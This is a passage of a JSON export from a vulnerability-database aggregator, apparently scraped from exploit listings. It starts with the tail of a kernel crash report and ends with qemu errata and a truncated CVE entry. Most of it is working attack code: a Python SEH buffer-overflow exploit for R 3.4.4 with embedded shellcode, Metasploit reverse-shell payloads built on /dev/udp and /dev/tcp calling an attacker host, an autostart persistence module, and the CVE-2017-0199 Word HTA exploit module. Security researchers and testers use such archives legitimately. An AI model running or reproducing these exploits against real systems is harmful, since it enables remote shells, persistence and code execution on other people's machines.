2684 pc : [<ffffffa68a07bbbc>] lr : [<ffffffa68a07bbfc>] pstate: 60400145\r\n<4>[ 448.087586] c4 2684 sp : ffffffd87e3b3880\r\n<4>[ 448.087591] c4 2684 x29: ffffffd87e3b3880 x28: ffffffa68ca1a000 \r\n<4>[ 448.087595] c4 2684 x27: 000000000591e848 x26: ffffffd87e3b3920 \r\n<4>[ 448.087598] c4 2684 x25: 0000000000000140 x24: 0000000000000000 \r\n<4>[ 448.087601] c4 2684 x23: ffffffd87e3b3920 x22: ffffffa68a07bbbc \r\n<4>[ 448.087604] c4 2684 x21: 0000000000000000 x20: ffffffd8929f8040 \r\n<4>[ 448.087607] c4 2684 x19: ffffffd8929f8040 x18: 00000000c8056d20 \r\n<4>[ 448.087611] c4 2684 x17: 000000002c754130 x16: 0000000085837409 \r\n<4>[ 448.087613] c4 2684 x15: 00000000a50d5ad3 x14: 0000000000000000 \r\n<4>[ 448.087617] c4 2684 x13: 0000000001075000 x12: ffffffffffffffff \r\n<4>[ 448.087620] c4 2684 x11: 0000000000000040 x10: ffffff8b0fc76746 \r\n<4>[ 448.087623] c4 2684 x9 : ffffff8b0fc76745 x8 : ffffffd87e3b3a2b \r\n<4>[ 448.087626] c4 2684 x7 : 0000000000000000 x6 : ffffffd87e3b3a08 \r\n<4>[ 448.087629] c4 2684 x5 : fffffffffe8c0000 x4 : 0000000000000000 \r\n<4>[ 448.087632] c4 2684 x3 : fBCho<D7>\r\n^@^@<90>^A*^A<91><F9>%5fffffd8929f7ff0 x2 : 0000000000000000 \r\n<4>[ 448.087635] c4 2684 x1 : dead0000000000ff x0 : 0000000000000000 \r\n<4>[ 448.087637] c4 2684 \r\n<4>[ 448.087637] c4 2684 PC: 0xffffffa68a07bb7c:\r\n<4>[ 448.087646] c4 2684 bb7c 17fffff1 a9bc7bfd 910003fd a90153f3 a9025bf5 f9001bf7 f9400013 b4000253\r\n<4>[ 448.087655] c4 2684 bb9c 90000016 aa0103f5 aa0003f7 912ef2d6 14000002 aa1403f3 aa1503e0 b40001f5\r\n<4>[ 448.087664] c4 2684 bbbc b980c401 aa1603e2 f9400274 cb010261 97fff36f b5ffff14 f90006ff f90002ff\r\n<4>[ 448.087673] c4 2684 bbdc f9000aff a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 aa1303e0 97ffff93\r\n<4>[ 448.087675] c4 2684 \r\n<4>[ 448.087675] c4 2684 LR: 0xffffffa68a07bbbc:\r\n<4>[ 448.087684] c4 2684 bbbc b980c401 aa1603e2 f9400274 cb010261 97fff36f b5ffff14 f90006ff f90002ff\r\n<4>[ 448.087692] c4 2684 bbdc f9000aff a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 aa1303e0 97ffff93\r\n<4>[ 448.087701] c4 2684 bbfc 17fffff0 a9bc7bfd aa0003e2 910003fd a90153f3 f0012ed3 aa0003f4 b000eb40\r\n<4>[ 448.087711] c4 2684 bc1c 910083a1 d538d083 913c8000 f90013bf 8b000060 f9452a63 f9001fa3 f90017bf\r\n<4>[ 448.087712] c4 2684 \r\n<4>[ 448.087712] c4 2684 SP: 0xffffffd87e3b3840:\r\n<4>[ 448.087722] c4 2684 3840 8a07bbfc ffffffa6 7e3b3880 ffffffd8 8a07bbbc ffffffa6 60400145 00000000\r\n<4>[ 448.087731] c4 2684 3860 7e3b3920 ffffffd8 00000000 00000000 00000000 00000080 8b4ddfd0 ffffffa6\r\n<4>[ 448.087740] c4 2684 3880 7e3b38c0 ffffffd8 8a07bf9c ffffffa6 8c656000 ffffffa6 8ca1f500 ffffffa6\r\n<4>[ 448.087749] c4 2684 38a0 8ca1a000 ffffffa6 000000f7 00000000 8c68d000 ffffffa6 fabb3a00 ffffffd7\r\n<4>[ 448.087750] c4 2684 \r\n<0>[ 448.087753] c4 2684 Process poc (pid: 2684, stack limit = 0x0000000000000000)\r\n<4>[ 448.087754] c4 2684 Call trace:\r\n<4>[ 448.087758] c4 2684 Exception stack(0xffffffd87e3b3680 to 0xffffffd87e3b37b0)\r\n<4>[ 448.087763] c4 2684 3680: ffffffd8929f8040 0000008000000000 00000000836e2000 ffffffa68a07bbbc\r\n<4>[ 448.087768] c4 2684 36a0: 0000000060400145 0000000000000025 0000000000000140 ffffffd7fabb3a00\r\n<4>[ 448.087773] c4 2684 36c0: 0000000000000000 ffffffd87e3b37d0 ffffffd87e3b3720 ffffffa68a0768e0\r\n<4>[ 448.087779] c4 2684 36e0: ffffffbe224a7d80 0000000000000000 ffffffd7fabb3a00 ffffffd7fabb3a00\r\n<4>[ 448.087784] c4 2684 3700: 0000000100150015 ffffffd8929f7e00 0000000180150014 ffffffd899803b00\r\n<4>[ 448.087789] c4 2684 3720: ffffffd87e3b3830 ffffffa68a078b38 ffffffbe224a7d80 ffffffd8929f7ff0\r\n<4>[ 448.087794] c4 2684 3740: ffffffd7fabb3a00 e95cc056ac940c73 0000000000000000 dead0000000000ff\r\n<4>[ 448.087799] c4 2684 3760: 0000000000000000 ffffffd8929f7ff0 0000000000000000 fffffffffe8c0000\r\n<4>[ 448.087804] c4 2684 3780: ffffffd87e3b3a08 0000000000000000 ffffffd87e3b3a2b ffffff8b0fc76745\r\n<4>[ 448.087808] c4 2684 37a0: ffffff8b0fc76746 0000000000000040\r\n<4>[ 448.087813] c4 2684 [<ffffffa68a07bbbc>] qlist_free_all+0x3c/0x80\r\n<4>[ 448.087819] c4 2684 [<ffffffa68a07bf9c>] quarantine_reduce+0x17c/0x1a0\r\n<4>[ 448.087824] c4 2684 [<ffffffa68a07a1b4>] kasan_kmalloc+0xe0/0xe4\r\n<4>[ 448.087828] c4 2684 [<ffffffa68a07a964>] kasan_slab_alloc+0x14/0x1c\r\n<4>[ 448.087832] c4 2684 [<ffffffa68a078030>] kmem_cache_alloc+0x144/0x27c\r\n<4>[ 448.087840] c4 2684 [<ffffffa68a15d0dc>] ext4_inode_attach_jinode+0x9c/0x118\r\n<4>[ 448.087844] c4 2684 [<ffffffa68a150d74>] ext4_file_open+0xc8/0x21c\r\n<4>[ 448.087848] c4 2684 [<ffffffa68a087488>] do_dentry_open+0x350/0x4ec\r\n<4>[ 448.087851] c4 2684 [<ffffffa68a087930>] finish_open+0x74/0xa8\r\n<4>[ 448.087857] c4 2684 [<ffffffa68a09fa34>] path_openat+0x980/0x1404\r\n<4>[ 448.087861] c4 2684 [<ffffffa68a0a1a50>] do_filp_open+0x98/0x188\r\n<4>[ 448.087866] c4 2684 [<ffffffa68a089004>] do_sys_open+0x170/0x2d4\r\n<4>[ 448.087869] c4 2684 [<ffffffa68a0891a0>] SyS_openat+0x10/0x18\r\n<4>[ 448.087875] c4 2684 [<ffffffa689e842b0>] el0_svc_naked+0x24/0x28\r\n<0>[ 448.087881] c4 2684 Code: 14000002 aa1403f3 aa1503e0 b40001f5 (b980c401) \r\n<4>[ 448.087944] c4 2684 ---[ end trace 8d4DBGC\r\n==================================\r\n\r\nThe KASAN report points to instruction 267c in the following assembly:\r\n\r\n==================================\r\n0000000000002630 <set_page_dirty>:\r\n{\r\n 2630: a9bd7bfd stp x29, x30, [sp, #-48]!\r\n 2634: 910003fd mov x29, sp\r\n 2638: a90153f3 stp x19, x20, [sp, #16]\r\n 263c: f90013f5 str x21, [sp, #32]\r\n 2640: aa0003f3 mov x19, x0\r\n struct address_space *mapping = page_mapping(page);\r\n 2644: 94000000 bl 0 <page_mapping>\r\n 2648: aa0003f4 mov x20, x0\r\n 264c: d5384115 mrs x21, sp_el0\r\n if (current->jh_task_flags && mapping)\r\n 2650: 9128a2a0 add x0, x21, #0xa28\r\n 2654: 94000000 bl 0 <__asan_load4>\r\n 2658: b94a2aa0 ldr w0, [x21, #2600]\r\n 265c: 340000a0 cbz w0, 2670 <set_page_dirty+0x40>\r\n 2660: b40003b4 cbz x20, 26d4 <set_page_dirty+0xa4>\r\n msleep(500);\r\n 2664: 52803e80 mov w0, #0x1f4 // #500\r\n 2668: 94000000 bl 0 <msleep>\r\n 266c: 14000002 b 2674 <set_page_dirty+0x44>\r\n if (likely(mapping)) {\r\n 2670: b4000334 cbz x20, 26d4 <set_page_dirty+0xa4>\r\n int (*spd)(struct page *) = mapping->a_ops->set_page_dirty;\r\n 2674: 9101a280 add x0, x20, #0x68\r\n 2678: 94000000 bl 0 <__asan_load8>\r\n 267c: f9403694 ldr x20, [x20, #104]\r\n 2680: 91006280 add x0, x20, #0x18\r\n 2684: 94000000 bl 0 <__asan_load8>\r\n 2688: f9400e94 ldr x20, [x20, #24]\r\n 268c: aa1303e0 mov x0, x19\r\n 2690: 94000000 bl 0 <__asan_load8>\r\n 2694: f9400260 ldr x0, [x19]\r\n==================================\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46941.zip\n\n# 0day.today [2019-05-30] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32820"}, {"lastseen": "2018-08-29T20:36:15", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2018-08-29T00:00:00", "published": "2018-08-29T00:00:00", "id": "1337DAY-ID-30990", "href": "https://0day.today/exploit/description/30990", "title": "R 3.4.4 - Buffer Overflow (SEH) Exploit", "type": "zdt", "sourceData": "#--------------------------------------------------------#\r\n#Exploit Title: R v3.4.4 - (SEH) Buffer Overflow Exploit\r\n#Exploit Author : ZwX\r\n#Exploit Date: 2018-08-22\r\n#Vendor Homepage : https://www.r-project.org/\r\n#Tested on OS: Windows 7\r\n#Social: twitter.com/ZwX2a\r\n#contact: [email\u00a0protected]\r\n#Website: http://zwx-pentester.fr/\r\n#--------------------------------------------------------#\r\n \r\n \r\n#Technical Details & Description:\r\n#================================\r\n'''A local buffer overflow vulnerability has been discovered in the official R v3.4.4 software.\r\nThe vulnerability allows local attackers to overwrite the registers (example eip) to compromise the local software process.\r\nThe issue can be exploited by local attackers with system privileges to compromise the affected local computer system.\r\nThe vulnerability is marked as classic buffer overflow issue'''\r\n \r\n \r\n# Manual steps to reproduce the vulnerability: under GUI preferences\r\n# paste bo.txt contents into 'Language for menus and messages' click ok --> Now the calculator executes!\r\n \r\n \r\n#!/usr/bin/python\r\n \r\nfrom struct import pack\r\nbuffer = \"x41\" * 900\r\na = \"\\xeb\\x14\\x90\\x90\"\r\nb = pack(\"<I\",0x6cb85492) #pop esi # pop ebp # ret 04 | {PAGE_EXECUTE_READ} [R.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.4.4 (C:Program FilesRR-3.4.4bini386R.dll)\r\ncalc=(\"\\xdb\\xd7\\xd9\\x74\\x24\\xf4\\xb8\\x79\\xc4\\x64\\xb7\\x33\\xc9\\xb1\\x38\"\r\n\"\\x5d\\x83\\xc5\\x04\\x31\\x45\\x13\\x03\\x3c\\xd7\\x86\\x42\\x42\\x3f\\xcf\"\r\n\"\\xad\\xba\\xc0\\xb0\\x24\\x5f\\xf1\\xe2\\x53\\x14\\xa0\\x32\\x17\\x78\\x49\"\r\n\"\\xb8\\x75\\x68\\xda\\xcc\\x51\\x9f\\x6b\\x7a\\x84\\xae\\x6c\\x4a\\x08\\x7c\"\r\n\"\\xae\\xcc\\xf4\\x7e\\xe3\\x2e\\xc4\\xb1\\xf6\\x2f\\x01\\xaf\\xf9\\x62\\xda\"\r\n\"\\xa4\\xa8\\x92\\x6f\\xf8\\x70\\x92\\xbf\\x77\\xc8\\xec\\xba\\x47\\xbd\\x46\"\r\n\"\\xc4\\x97\\x6e\\xdc\\x8e\\x0f\\x04\\xba\\x2e\\x2e\\xc9\\xd8\\x13\\x79\\x66\"\r\n\"\\x2a\\xe7\\x78\\xae\\x62\\x08\\x4b\\x8e\\x29\\x37\\x64\\x03\\x33\\x7f\\x42\"\r\n\"\\xfc\\x46\\x8b\\xb1\\x81\\x50\\x48\\xc8\\x5d\\xd4\\x4d\\x6a\\x15\\x4e\\xb6\"\r\n\"\\x8b\\xfa\\x09\\x3d\\x87\\xb7\\x5e\\x19\\x8b\\x46\\xb2\\x11\\xb7\\xc3\\x35\"\r\n\"\\xf6\\x3e\\x97\\x11\\xd2\\x1b\\x43\\x3b\\x43\\xc1\\x22\\x44\\x93\\xad\\x9b\"\r\n\"\\xe0\\xdf\\x5f\\xcf\\x93\\xbd\\x35\\x0e\\x11\\xb8\\x70\\x10\\x29\\xc3\\xd2\"\r\n\"\\x79\\x18\\x48\\xbd\\xfe\\xa5\\x9b\\xfa\\xf1\\xef\\x86\\xaa\\x99\\xa9\\x52\"\r\n\"\\xef\\xc7\\x49\\x89\\x33\\xfe\\xc9\\x38\\xcb\\x05\\xd1\\x48\\xce\\x42\\x55\"\r\n\"\\xa0\\xa2\\xdb\\x30\\xc6\\x11\\xdb\\x10\\xa5\\xaf\\x7f\\xcc\\x43\\xa1\\x1b\"\r\n\"\\x9d\\xe4\\x4e\\xb8\\x32\\x72\\xc3\\x34\\xd0\\xe9\\x10\\x87\\x46\\x91\\x37\"\r\n\"\\x8b\\x15\\x7b\\xd2\\x2b\\xbf\\x83\")\r\nnops = \"\\x90\" * 20\r\n \r\npoc = buffer + a + b + nops + calc\r\nfile = open(\"bo.txt\",\"w\")\r\nfile.write(poc)\r\nfile.close()\r\n \r\nprint \"POC Created by ZwX\"\r\n \r\n \r\n#Solution - Fix & Patch:\r\n#=======================\r\n'''The solution could be to restrict and filter the number of characters on input of 'Language for menus and messages' '''\r\n \r\n \r\n# Disclaimer:\r\n#===============\r\n \r\n'''Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due\r\ncredit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the\r\nauthor. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related\r\ninformation or exploits by the author or elsewhere.\r\n \r\n \r\n \r\n Copyright A(c) 2018 | ZwX - Security Researcher (Software & web application)'''\n\n# 0day.today [2018-08-29] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30990"}], "metasploit": [{"lastseen": "2019-12-12T17:37:32", "bulletinFamily": "exploit", "description": "Creates an interactive shell via bash's builtin /dev/udp. This will not work on circa 2009 and older Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/udp feature.\n", "modified": "2019-05-24T06:33:44", "published": "2019-05-20T07:57:01", "id": "MSF:PAYLOAD/CMD/UNIX/REVERSE_BASH_UDP", "href": "", "type": "metasploit", "title": "Unix Command Shell, Reverse UDP (/dev/udp)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_udp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = :dynamic\n\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Unix Command Shell, Reverse UDP (/dev/udp)',\n 'Description' => %q{\n Creates an interactive shell via bash's builtin /dev/udp.\n\n This will not work on circa 2009 and older Debian-based Linux\n distributions (including Ubuntu) because they compile bash\n without the /dev/udp feature.\n },\n 'Author' => [\n 'hdm', # Reverse bash TCP\n 'bcoles' # Reverse bash UDP\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Handler' => Msf::Handler::ReverseUdp,\n 'Session' => Msf::Sessions::CommandShell,\n 'PayloadType' => 'cmd_bash',\n 'RequiredCmd' => 'bash-udp',\n 'Payload' =>\n {\n 'Offsets' => { },\n 'Payload' => ''\n }\n ))\n end\n\n #\n # Constructs the payload\n #\n def generate\n return super + command_string\n end\n\n #\n # Returns the command string to use for execution\n #\n def command_string\n fd = rand(200) + 20\n return \"0<&#{fd}-;exec #{fd}<>/dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']};echo>&#{fd};sh <&#{fd} >&#{fd} 2>&#{fd}\";\n\n # no semicolons\n #return \"sh -i >& /dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1\"\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/cmd/unix/reverse_bash_udp.rb"}, {"lastseen": "2019-11-30T03:57:00", "bulletinFamily": "exploit", "description": "This module will create an autostart entry to execute a payload. The payload will be executed when the users logs in.\n", "modified": "2018-08-20T09:51:41", "published": "2018-07-15T10:01:30", "id": "MSF:EXPLOIT/LINUX/LOCAL/AUTOSTART_PERSISTENCE", "href": "", "type": "metasploit", "title": "Autostart Desktop Item Persistence", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Unix\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Autostart Desktop Item Persistence',\n 'Description' => %q(\n This module will create an autostart entry to execute a payload.\n The payload will be executed when the users logs in.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [ 'Eliott Teissonniere' ],\n 'Platform' => [ 'unix', 'linux' ],\n 'Arch' => ARCH_CMD,\n 'Payload' => {\n 'BadChars' => '#%\\n\"',\n 'Compat' => {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic python netcat perl'\n }\n },\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },\n 'DisclosureDate' => 'Feb 13 2006', # Date of the 0.5 doc for autostart\n 'Targets' => [ ['Automatic', {}] ],\n 'DefaultTarget' => 0\n ))\n\n register_options([ OptString.new('NAME', [false, 'Name of autostart entry' ]) ])\n end\n\n def exploit\n name = datastore['NAME'] || Rex::Text.rand_text_alpha(5)\n\n home = cmd_exec('echo ~')\n\n path = \"#{home}/.config/autostart/#{name}.desktop\"\n\n print_status('Making sure the autostart directory exists')\n cmd_exec(\"mkdir -p #{home}/.config/autostart\") # in case no autostart exists\n\n print_status(\"Uploading autostart file #{path}\")\n\n write_file(path, [\n \"[Desktop Entry]\",\n \"Type=Application\",\n \"Name=#{name}\",\n \"NoDisplay=true\",\n \"Terminal=false\",\n \"Exec=/bin/sh -c \\\"#{payload.encoded}\\\"\"\n ].join(\"\\n\"))\n end\nend\n\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/autostart_persistence.rb"}, {"lastseen": "2019-11-23T19:19:56", "bulletinFamily": "exploit", "description": "Connect back and create a command shell via Ksh. Note: Although Ksh is often available, please be aware it isn't usually installed by default.\n", "modified": "2018-05-16T00:56:55", "published": "2018-05-15T14:36:47", "id": "MSF:PAYLOAD/CMD/UNIX/REVERSE_KSH", "href": "", "type": "metasploit", "title": "Unix Command Shell, Reverse TCP (via Ksh)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 52\n\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Unix Command Shell, Reverse TCP (via Ksh)',\n 'Description' => %q{\n Connect back and create a command shell via Ksh. Note: Although Ksh is often\n available, please be aware it isn't usually installed by default.\n },\n 'Author' => 'Wang Yihang <wangyihanger[at]gmail.com>',\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'ksh',\n 'Payload' => { 'Offsets' => {}, 'Payload' => '' }\n ))\n end\n\n def generate\n super + command_string\n end\n\n def command_string\n \"ksh -c 'ksh >/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 2>&1 <&1'\"\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/cmd/unix/reverse_ksh.rb"}, {"lastseen": "2019-12-12T11:39:57", "bulletinFamily": "exploit", "description": "This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in how a olelink object can make a http(s) request, and execute hta code in response. This bug was originally seen being exploited in the wild starting in Oct 2016. This module was created by reversing a public malware sample.\n", "modified": "2017-08-20T22:48:03", "published": "2017-04-15T02:32:48", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_WORD_HTA", "href": "", "type": "metasploit", "title": "Microsoft Office Word Malicious Hta Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => \"Microsoft Office Word Malicious Hta Execution\",\n 'Description' => %q{\n This module creates a malicious RTF file that when opened in\n vulnerable versions of Microsoft Word will lead to code execution.\n The flaw exists in how a olelink object can make a http(s) request,\n and execute hta code in response.\n\n This bug was originally seen being exploited in the wild starting\n in Oct 2016. This module was created by reversing a public\n malware sample.\n },\n 'Author' =>\n [\n 'Haifei Li', # vulnerability analysis\n 'ryHanson',\n 'wdormann',\n 'DidierStevens',\n 'vysec',\n 'Nixawk', # module developer\n 'sinn3r' # msf module improvement\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2017-0199'],\n ['URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/'],\n ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html'],\n ['URL', 'https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/'],\n ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html'],\n ['URL', 'https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html'],\n ['URL', 'https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf'],\n ['URL', 'https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/'],\n ['URL', 'https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100'],\n ['URL', 'https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/'],\n ['URL', 'https://www.microsoft.com/en-us/download/details.aspx?id=10725'],\n ['URL', 'https://msdn.microsoft.com/en-us/library/dd942294.aspx'],\n ['URL', 'https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf'],\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199']\n ],\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Microsoft Office Word', {} ]\n ],\n 'DefaultOptions' =>\n {\n 'DisablePayloadHandler' => false\n },\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'DisclosureDate' => 'Apr 14 2017'))\n\n register_options([\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),\n OptString.new('URIPATH', [ true, 'The URI to use for the HTA file', 'default.hta'])\n ])\n end\n\n def generate_uri\n uri_maxlength = 112\n\n host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']\n scheme = datastore['SSL'] ? 'https' : 'http'\n\n uri = \"#{scheme}://#{host}:#{datastore['SRVPORT']}#{'/' + Rex::FileUtils.normalize_unix_path(datastore['URIPATH'])}\"\n uri = Rex::Text.hexify(Rex::Text.to_unicode(uri))\n uri.delete!(\"\\n\")\n uri.delete!(\"\\\\x\")\n uri.delete!(\"\\\\\")\n\n padding_length = uri_maxlength * 2 - uri.length\n fail_with(Failure::BadConfig, \"please use a uri < #{uri_maxlength} bytes \") if padding_length < 0\n padding_length.times { uri << \"0\" }\n uri\n end\n\n def create_ole_ministream_data\n # require 'rex/ole'\n # ole = Rex::OLE::Storage.new('cve-2017-0199.bin', Rex::OLE::STGM_READ)\n # ministream = ole.instance_variable_get(:@ministream)\n # ministream_data = ministream.instance_variable_get(:@data)\n\n ministream_data = \"\"\n ministream_data << \"01000002090000000100000000000000\" # 00000000: ................\n ministream_data << \"0000000000000000a4000000e0c9ea79\" # 00000010: ...............y\n ministream_data << \"f9bace118c8200aa004ba90b8c000000\" # 00000020: .........K......\n ministream_data << generate_uri\n ministream_data << \"00000000795881f43b1d7f48af2c825d\" # 000000a0: ....yX..;..H.,.]\n ministream_data << \"c485276300000000a5ab0000ffffffff\" # 000000b0: ..'c............\n ministream_data << \"0609020000000000c000000000000046\" # 000000c0: ...............F\n ministream_data << \"00000000ffffffff0000000000000000\" # 000000d0: ................\n ministream_data << \"906660a637b5d2010000000000000000\" # 000000e0: .f`.7...........\n ministream_data << \"00000000000000000000000000000000\" # 000000f0: ................\n ministream_data << \"100203000d0000000000000000000000\" # 00000100: ................\n ministream_data << \"00000000000000000000000000000000\" # 00000110: ................\n ministream_data << \"00000000000000000000000000000000\" # 00000120: ................\n ministream_data << \"00000000000000000000000000000000\" # 00000130: ................\n ministream_data << \"00000000000000000000000000000000\" # 00000140: ................\n ministream_data << \"00000000000000000000000000000000\" # 00000150: ................\n ministream_data << \"00000000000000000000000000000000\" # 00000160: ................\n ministream_data << \"00000000000000000000000000000000\" # 00000170: ................\n ministream_data << \"00000000000000000000000000000000\" # 00000180: ................\n ministream_data << \"00000000000000000000000000000000\" # 00000190: ................\n ministream_data << \"00000000000000000000000000000000\" # 000001a0: ................\n ministream_data << \"00000000000000000000000000000000\" # 000001b0: ................\n ministream_data << \"00000000000000000000000000000000\" # 000001c0: ................\n ministream_data << \"00000000000000000000000000000000\" # 000001d0: ................\n ministream_data << \"00000000000000000000000000000000\" # 000001e0: ................\n ministream_data << \"00000000000000000000000000000000\" # 000001f0: ................\n ministream_data\n end\n\n def create_rtf_format\n template_path = ::File.join(Msf::Config.data_directory, \"exploits\", \"cve-2017-0199.rtf\")\n template_rtf = ::File.open(template_path, 'rb')\n\n data = template_rtf.read(template_rtf.stat.size)\n data.gsub!('MINISTREAM_DATA', create_ole_ministream_data)\n template_rtf.close\n data\n end\n\n def on_request_uri(cli, req)\n p = regenerate_payload(cli)\n data = Msf::Util::EXE.to_executable_fmt(\n framework,\n ARCH_X86,\n 'win',\n p.encoded,\n 'hta-psh',\n { :arch => ARCH_X86, :platform => 'win' }\n )\n\n send_response(cli, data, 'Content-Type' => 'application/hta')\n end\n\n def exploit\n file_create(create_rtf_format)\n super\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/office_word_hta.rb"}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:54", "bulletinFamily": "unix", "description": "[12:2.9.0-17.el7]\n- i386: Remove generic SMT thread check (Babu Moger) [Orabug: 28676425]\n- pc: Fix typo on PC_COMPAT_2_12 (Eduardo Habkost) [Orabug: 28676425]\n- i386: Enable TOPOEXT feature on AMD EPYC CPU (Babu Moger) [Orabug: 28676425]\n- net: ignore packet size greater than INT_MAX (Jason Wang) [Orabug: 28762625] {CVE-2018-17963}\n- pcnet: fix possible buffer overflow (Jason Wang) [Orabug: 28762617] {CVE-2018-17962}\n- rtl8139: fix possible out of bound access (Jason Wang) [Orabug: 28762613] {CVE-2018-17958}\n- ne2000: fix possible out of bound access in ne2000_receive (Jason Wang) [Orabug: 28733338] {CVE-2018-10839}\n- seccomp: set the seccomp filter to all threads (Marc-Andre Lureau) [Orabug: 28576303] {CVE-2018-15746}\n- virtio_net: Introduce VIRTIO_NET_F_STANDBY feature bit to virtio_net (Venu Busireddy) [Orabug: 28497003]\n- virtio-net: use 64-bit values for feature flags (Jason Baron) [Orabug: 28497003]\n- qga: check bytes count read by guest-file-read (Prasad J Pandit) [Orabug: 28312939] {CVE-2018-12617}\n- CVE-2017-2630: Qemu: nbd: oob stack write in client routine drop_sync (Mark Kanda) [Orabug: 28424694] {CVE-2017-2630}\n- CVE-2017-2633: Qemu: VNC: memory corruption due to unchecked resolution limit (Mark Kanda) [Orabug: 28424697] {CVE-2017-2633}\n- CVE-2017-7471: Qemu: 9p: virtfs allows guest to change filesystem attributes (Mark Kanda) [Orabug: 28407849] {CVE-2017-7471}\n- slirp: correct size computation while concatenating mbuf (Prasad J Pandit) [Orabug: 28263244] {CVE-2018-11806}", "modified": "2018-10-29T00:00:00", "published": "2018-10-29T00:00:00", "id": "ELSA-2018-4262", "href": "http://linux.oracle.com/errata/ELSA-2018-4262.html", "title": "qemu security update", "type": "oraclelinux", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2019-10-16T17:30:09", "bulletinFamily": "NVD", "description": "Systems with microprocessors utilizing speculative execution and speculative execution of memory reads before the addresses of all prior memory writes are known may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis, aka Speculative Store Bypass (SSB), Variant 4.", "modified": "2019-05-23T15:29:00", "id": "CVE-2018-3639", "href": 